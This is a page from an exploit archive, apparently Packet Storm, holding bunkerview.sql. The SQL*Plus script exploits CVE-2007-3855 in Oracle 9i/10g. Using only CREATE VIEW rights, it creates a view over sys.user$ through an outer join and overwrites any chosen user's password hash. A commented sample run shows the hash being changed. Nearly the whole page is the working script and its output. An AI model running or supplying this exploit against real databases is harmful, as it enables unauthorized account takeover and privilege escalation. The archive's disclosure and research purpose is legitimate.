exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bunkerview.txt

bunkerview.txt
Posted Jul 20, 2007
Authored by Andrea Purificato | Site rawlab.mindcreations.com

Oracle 9i and 10g evil view change password exploit.

tags | exploit
advisories | CVE-2007-3855
SHA-256 | 67a721e9a7e576c4b91c255ef53da472e4330cc3f959dc516deafe74bdaf2711
Download | Favorite | View

bunkerview.txt

Change Mirror Download
--
-- bunkerview.sql 
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
-- 
-- USERNAME                       PRIVILEGE                                ADM
-- ------------------------------ ---------------------------------------- ---
-- TEST                           CREATE VIEW                              NO
-- TEST                           CREATE SESSION                           NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
-- 
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
-- 
-- Target username (default TEST):
-- 
-- View created.
-- 
-- old   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'
-- new   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'
-- 
-- 1 row updated.
-- 
-- 
-- View dropped.
-- 
-- 
-- Commit complete.
-- 
-- SQL> select password from sys.user$ where name='TEST';
-- 
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
create or replace view bunkerview as 
  select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;
  update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';
  drop view bunkerview;
commit;
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close